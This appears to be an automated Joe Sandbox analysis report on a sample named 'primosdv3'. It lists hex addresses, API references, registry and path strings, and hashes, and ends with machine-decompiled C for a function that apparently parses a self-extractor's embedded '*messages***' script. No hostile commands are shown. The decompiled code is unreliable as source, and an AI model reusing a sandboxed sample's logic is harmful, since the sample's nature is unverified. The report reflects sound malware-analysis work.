0x00c7c7d8
0x00c7c7d6
0x00c7c7e0
0x00000000
0x00000000
0x00c7c7e6
0x00000000
0x00c7c7ed
0x00c7c7f0
0x00c7c7f6
0x00c7c803
0x00c7c829
0x00c7c83d
0x00c7c840
0x00c7c84b
0x00c7c98f
0x00c7c98f
0x00c7c99d
0x00c7c9a2
0x00c7c9a4
0x00000000
0x00000000
0x00c7c85d
0x00c7c863
0x00c7c869
0x00c7c90f
0x00c7c916
0x00c7c91c
0x00c7c91f
0x00000000
0x00000000
0x00c7c928
0x00c7c92e
0x00c7c930
0x00000000
0x00c7c932
0x00c7c932
0x00c7c934
0x00c7c935
0x00c7c939
0x00c7c94d
0x00c7c952
0x00c7c95c
0x00c7c962
0x00c7c965
0x00c7c937
0x00c7c937
0x00c7c938
0x00000000
0x00c7c967
0x00c7c975
0x00c7c97b
0x00c7c97d
0x00c7c989
0x00c7c989
0x00000000
0x00c7c97d
0x00c7c965
0x00c7c930
0x00c7c87e
0x00c7c88b
0x00c7c89c
0x00c7c89f
0x00c7c8a2
0x00c7c8b5
0x00c7c8bc
0x00c7c8c1
0x00c7c8c3
0x00000000
0x00000000
0x00c7c8c9
0x00c7c8d0
0x00c7c8d5
0x00c7c8da
0x00c7c8e6
0x00c7c8eb
0x00c7c8ee
0x00c7c8f5
0x00c7c8f7
0x00c7c8f8
0x00c7c902
0x00c7c908
0x00c7c909
0x00000000
0x00c7c909
0x00c7c8ab
0x00c7c8b1
0x00c7c8b3
0x00000000
0x00000000
0x00000000
0x00c7c8b3
0x00c7c9aa
0x00c7c9b4
0x00c7c9b4
0x00000000
0x00000000
0x00c7c9be
0x00c7c9c0
0x00c7ca13
0x00c7ca18
0x00c7ca21
0x00c7ca22
0x00c7ca28
0x00c7ca2d
0x00c7ca30
0x00c7ca32
0x00c7ca44
0x00c7ca49
0x00c7ca4a
0x00c7ca4a
0x00c7ca4b
0x00c7ca4d
0x00c7ca54
0x00c7ca59
0x00c7ca4d
0x00000000
0x00000000
0x00c7ca5f
0x00c7ca61
0x00c7ca71
0x00c7ca71
0x00000000
0x00000000
0x00c7ca7c
0x00c7ca7e
0x00000000
0x00000000
0x00c7ca84
0x00c7ca8b
0x00000000
0x00000000
0x00c7ca91
0x00c7ca93
0x00c7ca99
0x00c7ca9b
0x00c7caa2
0x00c7caa3
0x00c7caaa
0x00c7caac
0x00c7caac
0x00c7cab3
0x00c7cab8
0x00c7cabe
0x00c7cac0
0x00000000
0x00c7cac6
0x00c7cac6
0x00c7cac9
0x00c7cacb
0x00c7cacc
0x00c7cacf
0x00c7caf8
0x00c7cafb
0x00c7cbe0
0x00c7cbe9
0x00c7cbee
0x00c7cbee
0x00c7cbf0
0x00c7cbf0
0x00c7cbf2
0x00c7cbf4
0x00c7cbfb
0x00c7cc00
0x00c7cc01
0x00c7cc02
0x00c7cc04
0x00c7cc06
0x00c7cc0a
0x00c7cc0c
0x00c7cc0c
0x00c7cc0e
0x00c7cc0e
0x00c7cc0a
0x00c7cc12
0x00c7cc18
0x00c7cc25
0x00c7cc2c
0x00c7cc3c
0x00c7cc46
0x00c7cc54
0x00c7cc5a
0x00c7cc62
0x00c7cc67
0x00c7cc68
0x00c7cc69
0x00c7cc6b
0x00c7cc7f
0x00c7cc7f
0x00000000
0x00c7cc6b
0x00c7cb01
0x00c7cb01
0x00c7cb04
0x00c7cb11
0x00c7cb11
0x00c7cb14
0x00c7cb16
0x00c7cb17
0x00c7cb19
0x00c7cb1a
0x00c7cb1f
0x00c7cb24
0x00c7cb2a
0x00c7cb2c
0x00c7cb2e
0x00c7cb31
0x00c7cb38
0x00c7cb39
0x00c7cb3f
0x00c7cb40
0x00c7cb43
0x00c7cb44
0x00c7cb45
0x00c7cb4a
0x00c7cb4d
0x00c7cb53
0x00c7cb5c
0x00c7cb5f
0x00c7cb64
0x00c7cb66
0x00c7cb68
0x00c7cb6a
0x00c7cb6a
0x00c7cb6c
0x00c7cb6c
0x00c7cb6e
0x00c7cb6e
0x00c7cb76
0x00c7cb7d
0x00c7cb7f
0x00c7cb86
0x00c7cb8c
0x00c7cb8e
0x00c7cb8f
0x00c7cb97
0x00c7cba6
0x00c7cba6
0x00c7cb97
0x00c7cbb1
0x00c7cbb3
0x00c7cbc2
0x00c7cbc8
0x00c7cbce
0x00c7cbd9
0x00c7cbd9
0x00000000
0x00c7cbce
0x00c7cb06
0x00c7cb0b
0x00000000
0x00000000
0x00000000
0x00c7cb0b
0x00c7cad1
0x00c7cad5
0x00000000
0x00000000
0x00c7cad7
0x00c7cada
0x00c7cadc
0x00c7cadf
0x00000000
0x00c7cae5
0x00c7caee
0x00000000
0x00c7caee
0x00c7cadf
0x00000000
0x00c7cc8a
0x00c7cc8b
0x00c7cc90
0x00c7cc92
0x00c7cc95
0x00c7cc95
0x00000000
0x00c7cccb
0x00c7ccd2
0x00c7ccd4
0x00c7ccd4
0x00c7ccd6
0x00c7cd05
0x00c7cd05
0x00c7cd0b
0x00000000
0x00c7cd0b
0x00c7ccd8
0x00c7ccd8
0x00c7ccdb
0x00c7ccf4
0x00c7ccfa
0x00c7ccfa
0x00000000
0x00c7ccfa
0x00c7ccdd
0x00c7ccdd
0x00c7cce0
0x00000000
0x00000000
0x00c7cce2
0x00c7cce2
0x00c7cce5
0x00000000
0x00000000
0x00c7cceb
0x00000000
0x00000000
0x00c7cd58
0x00c7cd5a
0x00c7cd61
0x00c7cd62
0x00c7cd68
0x00c7cd70
0x00c7cd72
0x00c7cd75
0x00c7ce25
0x00c7ce25
0x00c7ce29
0x00c7ce38
0x00c7ce3c
0x00000000
0x00000000
0x00c7ce42
0x00c7ce45
0x00000000
0x00000000
0x00c7ce4b
0x00c7ce4b
0x00c7ce4d
0x00c7ce4e
0x00c7ce4e
0x00c7ce4f
0x00c7ce50
0x00c7ce53
0x00000000
0x00c7ce53
0x00c7ce2b
0x00c7ce2e
0x00000000
0x00000000
0x00c7ce34
0x00000000
0x00c7ce34
0x00c7cd7b
0x00c7cd81
0x00c7cd83
0x00c7cd84
0x00c7cd89
0x00c7cd8a
0x00c7cd8b
0x00c7cd8d
0x00c7ce22
0x00c7ce22
0x00000000
0x00c7ce22
0x00c7cd93
0x00c7cd93
0x00c7cd96
0x00c7cd99
0x00c7cd9b
0x00c7cd9e
0x00c7cda4
0x00c7cda6
0x00c7cda7
0x00c7cdad
0x00c7cdae
0x00c7cdb3
0x00c7cdb6
0x00c7cdb8
0x00000000
0x00000000
0x00c7cdba
0x00c7cdbc
0x00c7cdbc
0x00c7cdc4
0x00000000
0x00000000
0x00c7cdcb
0x00c7cdd2
0x00c7cdd7
0x00c7cdde
0x00c7cde0
0x00c7cde2
0x00c7cde9
0x00c7cdee
0x00c7cdf0
0x00c7cdf2
0x00c7cdf4
0x00c7cdf4
0x00c7cdfa
0x00c7ce01
0x00c7ce06
0x00c7ce08
0x00c7ce0a
0x00c7ce0c
0x00c7ce0c
0x00c7ce0d
0x00c7ce0f
0x00c7ce15
0x00c7ce16
0x00c7ce1c
0x00c7ce1e
0x00c7ce20
0x00000000
0x00000000
0x00000000
0x00000000
0x00c7ce20
0x00000000
0x00000000
0x00c7ce87
0x00c7ce8a
0x00c7d009
0x00c7d00c
0x00c7d012
0x00c7d018
0x00c7d01a
0x00c7d01a
0x00c7d024
0x00c7d024
0x00000000
0x00c7d00c
0x00c7ce90
0x00c7ce96
0x00c7cea4
0x00c7ceab
0x00c7ceb0
0x00c7ceb2
0x00c7ceb4
0x00c7ceb9
0x00c7ceb9
0x00c7ced1
0x00c7cede
0x00c7cee3
0x00c7cee5
0x00000000
0x00000000
0x00c7ceb7
0x00c7ceb7
0x00c7ceb8
0x00c7ceb8
0x00c7cef1
0x00c7cef7
0x00c7cefe
0x00000000
0x00000000
0x00c7cf04
0x00c7cf0a
0x00000000
0x00000000
0x00c7cf10
0x00c7cf12
0x00c7cf19
0x00c7cf1f
0x00c7cf21
0x00c7cf22
0x00c7cf27
0x00c7cf28
0x00c7cf29
0x00c7cf2b
0x00c7cf7b
0x00c7cf7b
0x00c7cf82
0x00c7cf90
0x00c7cfa1
0x00c7cfaf
0x00c7cfaf
0x00c7cfbb
0x00c7cfc0
0x00c7cfc2
0x00c7cfd2
0x00c7cfdc
0x00c7cfe1
0x00c7cfe4
0x00c7cfef
0x00c7cff1
0x00c7cff8
0x00c7cffe
0x00c7cffe
0x00000000
0x00c7cfe4
0x00c7cf2d
0x00c7cf34
0x00c7cf36
0x00c7cf39
0x00000000
0x00000000
0x00c7cf3b
0x00c7cf3e
0x00c7cf3e
0x00c7cf42
0x00000000
0x00000000
0x00c7cf44
0x00c7cf4c
0x00c7cf4d
0x00c7cf4f
0x00c7cf52
0x00000000
0x00000000
0x00000000
0x00c7cf54
0x00c7cf61
0x00c7cf6c
0x00c7cf71
0x00c7cf71
0x00c7cf73
0x00000000
0x00000000
0x00c7d030
0x00c7d033
0x00c7d035
0x00c7d03c
0x00c7d03e
0x00c7d044
0x00c7d045
0x00c7d04a
0x00c7d04b
0x00c7d04b
0x00c7d050
0x00c7d053
0x00c7d059
0x00c7d059
0x00c7d05e
0x00000000
0x00000000
0x00c7d06a
0x00c7d06d
0x00000000
0x00000000
0x00c7d073
0x00c7d075
0x00c7d07c
0x00c7d084
0x00c7d08a
0x00c7d08d
0x00c7d0b0
0x00c7d0b7
0x00c7d08f
0x00c7d08f
0x00c7d092
0x00c7d0a2
0x00c7d0a9
0x00c7d094
0x00c7d094
0x00c7d09b
0x00c7d09b
0x00c7d092
0x00c7d0bc
0x00c7d0ca
0x00c7d0cf
0x00c7d0d1
0x00c7d0d8
0x00c7d0e7
0x00c7d0ee
0x00c7d0f3
0x00c7d0f5
0x00c7d0f6
0x00c7d0fd
0x00c7d150
0x00c7d155
0x00c7d157
0x00000000
0x00000000
0x00c7d15d
0x00c7d164
0x00c7d16a
0x00c7d16c
0x00c7d16f
0x00c7d221
0x00000000
0x00c7d221
0x00c7d175
0x00c7d178
0x00c7d178
0x00c7d17a
0x00c7d17b
0x00c7d17e
0x00c7d188
0x00c7d188
0x00c7d18a
0x00c7d194
0x00c7d199
0x00c7d19b
0x00c7d1fd
0x00c7d1fd
0x00000000
0x00c7d1fd
0x00c7d1a4
0x00c7d1aa
0x00c7d1af
0x00c7d1b1
0x00000000
0x00000000
0x00c7d1b3
0x00c7d1b5
0x00c7d1b6
0x00c7d1b9
0x00c7d1bb
0x00c7d1be
0x00c7d1d4
0x00c7d1d6
0x00c7d1d8
0x00c7d1de
0x00c7d1de
0x00c7d1e1
0x00000000
0x00000000
0x00c7d1db
0x00c7d1db
0x00c7d1db
0x00c7d1e3
0x00c7d1e9
0x00c7d1eb
0x00c7d1f0
0x00c7d1f3
0x00c7d1f8
0x00000000
0x00c7d1f8
0x00c7d1c0
0x00c7d1c7
0x00c7d1cc
0x00000000
0x00c7d1cc
0x00c7d180
0x00c7d182
0x00c7d183
0x00c7d186
0x00000000
0x00000000
0x00000000
0x00c7d200
0x00c7d200
0x00c7d203
0x00c7d206
0x00c7d208
0x00c7d208
0x00c7d211
0x00c7d216
0x00c7d218
0x00c7d21a
0x00c7d21c
0x00c7d21c
0x00000000
0x00c7d0ff
0x00c7d107
0x00c7d113
0x00c7d119
0x00c7d11a
0x00c7d11b
0x00c7d120
0x00c7d121
0x00c7d122
0x00c7d124
0x00c7d12a
0x00c7d12c
0x00c7d13f
0x00c7d13f
0x00c7d226
0x00c7d226
0x00c7d22e
0x00c7d238
0x00c7d23f
0x00c7d23f
0x00c7d24c
0x00c7d253
0x00c7d258
0x00c7d260
0x00c7d26c
0x00c7d26c
0x00c7d279
0x00c7d27e
0x00c7d286
0x00c7d290
0x00c7d29d
0x00c7d2a4
0x00c7d2a4
0x00c7d2b1
0x00c7d2b8
0x00c7d2bd
0x00c7d2c5
0x00c7d2cb
0x00c7d2cd
0x00c7d2cd
0x00c7d2e2
0x00c7d2e7
0x00c7d2f3
0x00c7d2f5
0x00c7d306
0x00c7d313
0x00000000
0x00c7d2f7
0x00c7d302
0x00c7d304
0x00c7d318
0x00c7d318
0x00c7d324
0x00c7d331
0x00c7d33d
0x00c7d344
0x00c7d349
0x00c7d350
0x00c7d356
0x00c7d35d
0x00c7d363
0x00c7d36a
0x00c7d36c
0x00c7d36e
0x00c7d370
0x00c7d372
0x00c7d378
0x00c7d37a
0x00c7d37c
0x00c7d37e
0x00c7d384
0x00c7d386
0x00c7d390
0x00c7d393
0x00c7d399
0x00c7d3a8
0x00c7d3ad
0x00c7d3b4
0x00c7d3b6
0x00c7d3b7
0x00c7d3bd
0x00c7d3be
0x00c7d3c0
0x00c7d3c5
0x00c7d3c5
0x00000000
0x00c7d3b4
0x00000000
0x00c7d304
0x00c7d2f5
0x00000000
0x00c7d3cd
0x00c7d3d0
0x00c7d3d2
0x00c7d3d2
0x00000000
0x00000000
0x00c7cd17
0x00c7cd1f
0x00c7cd25
0x00c7cd28
0x00c7cd4c
0x00c7cd2a
0x00c7cd2a
0x00c7cd2d
0x00c7cd40
0x00c7cd2f
0x00c7cd2f
0x00c7cd31
0x00c7cd36
0x00c7cd36
0x00c7cd2d
0x00000000
0x00000000
0x00c7ce5d
0x00c7ce5e
0x00c7ce63
0x00c7ce63
0x00c7ce63
0x00c7ce66
0x00c7ce6b
0x00c7ce71
0x00c7ce71
0x00c7ce7d
0x00c7ce7d
0x00000000
0x00000000
0x00c7c7a2
0x00c7c7a2
0x00c7c7a7
0x00c7c7a8
0x00c7c7a9
0x00c7c7ae
0x00c7c7b4
0x00c7c7b7
0x00000000
0x00c7c7b9
0x00c7c7b9
0x00000000
0x00c7c7b9
0x00c7d3d9
0x00c7d3d9
0x00c7d3de
0x00c7d3e2
0x00c7d3e6
0x00c7d3ed
0x00c7d3f4
0x00c7d3f7
0x00c7d3fc
0x00c7d3ff
0x00c7d402
0x00c7d40c

APIs

__EH_prolog.LIBCMT ref: 00C7C744

Part of subcall function 00C7B314: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 00C7B3FB

_wcslen.LIBCMT ref: 00C7CA0A
_wcslen.LIBCMT ref: 00C7CA13
SetWindowTextW.USER32(?,?), ref: 00C7CA71
_wcslen.LIBCMT ref: 00C7CAB3
_wcsrchr.LIBVCRUNTIME ref: 00C7CBFB
GetDlgItem.USER32(?,00000066), ref: 00C7CC36
SetWindowTextW.USER32(00000000,?), ref: 00C7CC46
SendMessageW.USER32(00000000,00000143,00000000,00CAA472), ref: 00C7CC54
SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00C7CC7F

Strings

%s.%d.tmp, xrefs: 00C7C940
<br>, xrefs: 00C7C9D4
ProgramFilesDir, xrefs: 00C7CB45
Software\Microsoft\Windows\CurrentVersion, xrefs: 00C7CB1A

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
API String ID: 2804936435-312220925
Opcode ID: e29f4ffee9c46431a92e9fff52c440f79db3e786aad66e5423c173f511fc195a
Instruction ID: 424a4525d5ddc83f014d7955bf6c2af0a70486c48909cea79a8f3452fdd104d1
Opcode Fuzzy Hash: e29f4ffee9c46431a92e9fff52c440f79db3e786aad66e5423c173f511fc195a
Instruction Fuzzy Hash: 09E156B2900159AADF25DBA0DC85EEE73BCAF04350F1481AAF619E7050EB749F849F64

Uniqueness

Uniqueness Score: -1.00%

Function 00C6DA67 Relevance: 23.4, APIs: 4, Strings: 9, Instructions: 663
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00C6DA67(char* __ecx, signed int __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				char* _t245;
				void* _t246;
				WCHAR* _t247;
				void* _t252;
				unsigned int _t258;
				signed int _t264;
				signed int _t268;
				void* _t279;
				signed short* _t283;
				void* _t284;
				void* _t290;
				signed short* _t294;
				void* _t295;
				signed int _t299;
				signed int _t303;
				signed int _t318;
				signed int _t322;
				signed int _t324;
				signed int _t326;
				signed int _t333;
				char* _t334;
				signed int _t338;
				short _t341;
				void* _t342;
				signed int _t346;
				char* _t348;
				char* _t350;
				char* _t355;
				void* _t358;
				void* _t360;
				void* _t363;
				signed int _t372;
				char* _t374;
				unsigned int _t385;
				unsigned int _t389;
				signed int _t392;
				signed int _t397;
				signed int _t399;
				void* _t400;
				signed int _t401;
				void* _t404;
				signed int _t406;
				signed int _t407;
				signed int _t410;
				signed int _t411;
				signed int _t412;
				char* _t421;
				signed int _t424;
				signed int _t425;
				void* _t430;
				char* _t434;
				signed int _t443;
				signed int _t444;
				signed int _t447;
				signed int _t448;
				signed int _t449;
				signed int _t450;
				char* _t451;
				signed int _t453;
				signed int _t455;
				void* _t456;
				intOrPtr* _t459;
				signed int _t461;
				signed int _t462;
				char* _t463;
				signed int _t466;
				signed int _t467;
				char** _t468;
				void* _t470;
				void* _t471;
				void* _t473;
				void* _t477;
				void* _t478;

				_t443 = __edx;
				_t471 = _t470 - 0x54;
				E00C7EB78(0xc929bd, _t468);
				E00C7EC50(0x41fc);
				_t245 = 0x5c;
				_push(_t245);
				_push(_t468[0x18]);
				_t459 = __ecx;
				_t468[4] = _t245;
				_t468[0xe] = __ecx;
				_t246 = E00C822C6(__ecx);
				_t372 = 0;
				_t475 = _t246;
				_t247 = _t468 - 0x31d0;
				if(_t246 != 0) {
					E00C70602(_t247, _t468[0x18], 0x800);
				} else {
					GetModuleFileNameW(0, _t247, 0x800);
					 *((short*)(E00C6C29A(_t475, _t468 - 0x31d0))) = 0;
					E00C705DA(_t475, _t468 - 0x31d0, _t468[0x18], 0x800);
				}
				E00C69556(_t468 - 0x4208);
				_push(4);
				 *(_t468 - 4) = _t372;
				_push(_t468 - 0x31d0);
				if(E00C698E0(_t468 - 0x4208, _t459) == 0) {
					L125:
					_t252 = E00C6959A(_t468 - 0x4208); // executed
					 *[fs:0x0] =  *((intOrPtr*)(_t468 - 0xc));
					__eflags =  &(_t468[0x16]);
					return _t252;
				} else {
					_t447 = _t372;
					_t477 =  *0xc9e720 - _t447; // 0x64
					if(_t477 <= 0) {
						L7:
						E00C86310(_t372,  *_t459,  *((intOrPtr*)(_t459 + 4)), 4, E00C6D6E0);
						E00C86310(_t372,  *((intOrPtr*)(_t459 + 0x14)),  *((intOrPtr*)(_t459 + 0x18)), 4, E00C6D640);
						_t473 = _t471 + 0x20;
						_t468[0x14] = _t372;
						_t448 = _t447 | 0xffffffff;
						_t468[0xf] = _t372;
						while(_t448 == 0xffffffff) {
							_t348 = E00C69E80(_t468 - 0x4208); // executed
							_t468[0x12] = _t348;
							_t350 = E00C69BD0(_t468 - 0x4208, _t443, _t468 - 0x21d0, 0x2000);
							_t468[0x11] = _t350;
							_t467 = _t372;
							_t24 = _t350 - 0x10; // -16
							_t434 = _t24;
							_t468[0xa] = _t434;
							if(_t434 < 0) {
								L25:
								_t351 = _t468[0x12];
								L26:
								E00C69D70(_t468 - 0x4208, _t468,  &(_t351[ &(_t468[0x11][0xfffffffffffffff0])]), _t372, _t372);
								_t355 =  &(_t468[0xf][1]);
								_t468[0xf] = _t355;
								__eflags = _t355 - 0x100;
								if(_t355 < 0x100) {
									continue;
								}
								__eflags = _t448 - 0xffffffff;
								if(_t448 == 0xffffffff) {
									goto L125;
								}
								break;
							} else {
								goto L10;
							}
							L12:
							_t363 = E00C86740(_t468 - 0x21ce + _t467, "*messages***", 0xb);
							_t473 = _t473 + 0xc;
							if(_t363 == 0) {
								L24:
								_t351 = _t468[0x12];
								_t448 =  &(_t468[0x12][_t467]);
								goto L26;
							} else {
								_t350 = _t468[0x11];
							}
							L14:
							_t443 = 0x2a;
							if( *((intOrPtr*)(_t468 + _t467 - 0x21d0)) != _t443) {
								L18:
								if( *((char*)(_t468 + _t467 - 0x21d0)) != 0x52 ||  *((char*)(_t468 + _t467 - 0x21cf)) != 0x61) {
									L21:
									_t467 = _t467 + 1;
									if(_t467 > _t468[0xa]) {
										goto L25;
									} else {
										_t350 = _t468[0x11];
										L10:
										if( *((char*)(_t468 + _t467 - 0x21d0)) != 0x2a ||  *((char*)(_t468 + _t467 - 0x21cf)) != 0x2a) {
											goto L14;
										} else {
											goto L12;
										}
									}
								} else {
									_t358 = E00C86740(_t468 - 0x21ce + _t467, 0xc939c8, 4);
									_t473 = _t473 + 0xc;
									if(_t358 == 0) {
										goto L125;
									}
									goto L21;
								}
							}
							_t439 = _t468 - 0x21cc + _t467;
							if( *((intOrPtr*)(_t468 - 0x21cc + _t467 - 2)) == _t443 && _t467 <=  &(_t350[0xffffffffffffffe0])) {
								_t360 = E00C86088(_t439, L"*messages***", 0xb);
								_t473 = _t473 + 0xc;
								if(_t360 == 0) {
									_t468[0x14] = 1;
									goto L24;
								}
							}
							goto L18;
						}
						asm("cdq");
						E00C69D70(_t468 - 0x4208, _t468, _t448, _t443, _t372);
						_push(0x200002);
						_t461 = E00C83E33(_t468 - 0x4208);
						_t468[0x13] = _t461;
						__eflags = _t461;
						if(_t461 == 0) {
							goto L125;
						}
						_t258 = E00C69BD0(_t468 - 0x4208, _t443, _t461, 0x200000);
						__eflags = _t468[0x14];
						_t385 = _t258;
						_t468[0x12] = _t385;
						if(_t468[0x14] == 0) {
							_push(2 + _t385 * 2);
							_t449 = E00C83E33(_t385);
							__eflags = _t449;
							if(_t449 == 0) {
								goto L125;
							}
							_t468[0x12][_t461] = _t372;
							E00C71B84(_t461, _t449,  &(_t468[0x12][1]));
							L00C83E2E(_t461);
							_t389 = _t468[0x12];
							_t461 = _t449;
							_t468[0x13] = _t461;
							L33:
							_t264 = 0x100000;
							__eflags = _t389 - 0x100000;
							if(_t389 <= 0x100000) {
								_t264 = _t389;
							}
							 *((short*)(_t461 + _t264 * 2)) = 0;
							E00C705A7(_t468 - 0x108, 0xc939d0, 0x64);
							_push(0x20002);
							_t450 = E00C83E33(0);
							_t468[0x11] = _t450;
							__eflags = _t450;
							if(_t450 != 0) {
								__eflags = _t468[0x12];
								_t462 = _t372;
								_t392 = _t372;
								_t468[0xc] = _t462;
								_t268 = _t372;
								 *(_t468 - 0x40) = _t372;
								_t468[0xb] = _t392;
								_t468[0x15] = _t268;
								_t468[0xa] = 0x20;
								_t468[0xf] = 9;
								if(_t468[0x12] <= 0) {
									L109:
									__eflags =  *(_t468 - 0x40);
									if( *(_t468 - 0x40) == 0) {
										_t463 = _t468[0xe];
										L122:
										L00C83E2E(_t468[0x13]);
										L00C83E2E(_t468[0x11]);
										_t451 =  &(_t463[0x3c]);
										__eflags = _t463[0x2c] - _t372;
										if(_t463[0x2c] <= _t372) {
											L124:
											 *0xca10b8 = _t463[0x28];
											E00C86310(_t372,  *_t451, _t463[0x40], 4, E00C6D7A0);
											E00C86310(_t372, _t463[0x50], _t463[0x54], 4, E00C6D7D0);
											goto L125;
										} else {
											goto L123;
										}
										do {
											L123:
											E00C6E261(_t451, _t443, _t372);
											E00C6E261( &(_t463[0x50]), _t443, _t372);
											_t372 = _t372 + 1;
											__eflags = _t372 - _t463[0x2c];
										} while (_t372 < _t463[0x2c]);
										goto L124;
									}
									_t468[7] = _t392;
									_t468[8] = E00C88CCE(_t372, _t462, _t468 - 0x40);
									_pop(_t397);
									__eflags = _t462;
									if(_t462 == 0) {
										L118:
										 *(_t450 + _t462 * 2) = 0;
										_t279 = 0x22;
										__eflags =  *_t450 - _t279;
										if( *_t450 == _t279) {
											__eflags = _t450;
										}
										_t468[9] = E00C87625(_t372, _t450);
										asm("movsd");
										asm("movsd");
										asm("movsd");
										_t463 = _t468[0xe];
										E00C6E27C( &(_t463[0x28]), _t443, _t397, _t397, _t450);
										goto L122;
									}
									_t212 = _t462 - 1; // -1
									_t283 = _t450 + _t212 * 2;
									_t443 = 0x20;
									do {
										_t397 =  *_t283 & 0x0000ffff;
										__eflags = _t397 - _t443;
										if(_t397 == _t443) {
											goto L114;
										}
										__eflags = _t397 - _t468[0xf];
										if(_t397 != _t468[0xf]) {
											break;
										}
										L114:
										_t397 = 0;
										 *_t283 = 0;
										_t283 = _t283 - 2;
										_t462 = _t462 - 1;
										__eflags = _t462;
									} while (_t462 != 0);
									__eflags = _t462;
									if(_t462 != 0) {
										_t284 = 0x22;
										__eflags =  *((intOrPtr*)(_t450 + _t462 * 2 - 2)) - _t284;
										if( *((intOrPtr*)(_t450 + _t462 * 2 - 2)) == _t284) {
											__eflags = 0;
											 *((short*)(_t450 + _t462 * 2 - 2)) = 0;
										}
									}
									goto L118;
								}
								_t468[6] = 0xd;
								_t468[5] = 0xa;
								do {
									_t399 = _t468[0x13];
									__eflags = _t268;
									if(_t268 == 0) {
										L75:
										_t443 =  *(_t399 + _t268 * 2) & 0x0000ffff;
										_t268 = _t268 + 1;
										_t468[0x15] = _t268;
										__eflags = _t443;
										if(_t443 == 0) {
											break;
										}
										__eflags = _t443 - _t468[4];
										if(_t443 != _t468[4]) {
											_t400 = 0xd;
											__eflags = _t443 - _t400;
											if(_t443 == _t400) {
												L93:
												__eflags =  *(_t468 - 0x40);
												if( *(_t468 - 0x40) == 0) {
													L105:
													 *(_t468 - 0x40) = _t372;
													_t462 = _t372;
													_t468[0xb] = _t372;
													L106:
													_t468[0xc] = _t462;
													goto L107;
												}
												_t468[7] = _t468[0xb];
												_t468[8] = E00C88CCE(_t372, _t462, _t468 - 0x40);
												_pop(_t401);
												__eflags = _t462;
												if(_t462 == 0) {
													L102:
													 *(_t450 + _t462 * 2) = 0;
													_t290 = 0x22;
													__eflags =  *_t450 - _t290;
													if( *_t450 == _t290) {
														__eflags = _t450;
													}
													_t468[9] = E00C87625(_t372, _t450);
													asm("movsd");
													asm("movsd");
													asm("movsd");
													E00C6E27C( &(_t468[0xe][0x28]), _t443, _t401, _t401, _t450);
													_t450 = _t468[0x11];
													_t268 = _t468[0x15];
													goto L105;
												}
												_t185 = _t462 - 1; // -1
												_t294 = _t450 + _t185 * 2;
												_t443 = 0x20;
												do {
													_t401 =  *_t294 & 0x0000ffff;
													__eflags = _t401 - _t443;
													if(_t401 == _t443) {
														goto L98;
													}
													__eflags = _t401 - _t468[0xf];
													if(_t401 != _t468[0xf]) {
														break;
													}
													L98:
													_t401 = 0;
													 *_t294 = 0;
													_t294 = _t294 - 2;
													_t462 = _t462 - 1;
													__eflags = _t462;
												} while (_t462 != 0);
												__eflags = _t462;
												if(_t462 != 0) {
													_t295 = 0x22;
													__eflags =  *((intOrPtr*)(_t450 + _t462 * 2 - 2)) - _t295;
													if( *((intOrPtr*)(_t450 + _t462 * 2 - 2)) == _t295) {
														__eflags = 0;
														 *((short*)(_t450 + _t462 * 2 - 2)) = 0;
													}
												}
												goto L102;
											}
											_t404 = 0xa;
											__eflags = _t443 - _t404;
											if(_t443 == _t404) {
												goto L93;
											}
											__eflags = _t462 - 0x10000;
											if(_t462 >= 0x10000) {
												goto L107;
											}
											L92:
											 *(_t450 + _t462 * 2) = _t443;
											_t462 = _t462 + 1;
											goto L106;
										}
										__eflags = _t462 - 0x10000;
										if(_t462 >= 0x10000) {
											goto L107;
										}
										_t406 = ( *(_t399 + _t268 * 2) & 0x0000ffff) - 0x22;
										__eflags = _t406;
										if(_t406 == 0) {
											_push(0x22);
											L88:
											_pop(_t407);
											 *(_t450 + _t462 * 2) = _t407;
											_t268 = _t268 + 1;
											_t468[0x15] = _t268;
											_t462 = _t462 + 1;
											goto L106;
										}
										_t410 = _t406 - 0x3a;
										__eflags = _t410;
										if(_t410 == 0) {
											_push(0x5c);
											goto L88;
										}
										_t411 = _t410 - 0x12;
										__eflags = _t411;
										if(_t411 == 0) {
											_push(0xa);
											goto L88;
										}
										_t412 = _t411 - 4;
										__eflags = _t412;
										if(_t412 == 0) {
											_push(0xd);
											goto L88;
										}
										__eflags = _t412 != 0;
										if(_t412 != 0) {
											goto L92;
										}
										_push(9);
										goto L88;
									}
									_t444 =  *(_t399 + _t268 * 2 - 2) & 0x0000ffff;
									__eflags = _t444 - _t468[6];
									if(_t444 == _t468[6]) {
										L42:
										_t443 = 0x3a;
										__eflags =  *(_t399 + _t268 * 2) - _t443;
										if( *(_t399 + _t268 * 2) != _t443) {
											L65:
											_t468[0x10] = _t399 + _t268 * 2;
											_t299 = E00C7045B( *(_t399 + _t268 * 2) & 0x0000ffff);
											__eflags = _t299;
											if(_t299 == 0) {
												L74:
												_t399 = _t468[0x13];
												_t268 = _t468[0x15];
												goto L75;
											}
											E00C70602(_t468 - 0x298, _t468[0x10], 0x64);
											_t303 = E00C86105(_t468 - 0x298, L" \t,");
											_t468[0x10] = _t303;
											__eflags = _t303;
											if(_t303 == 0) {
												goto L74;
											}
											 *_t303 = 0;
											E00C71DA7(_t468 - 0x298, _t468 - 0x16c, 0x64);
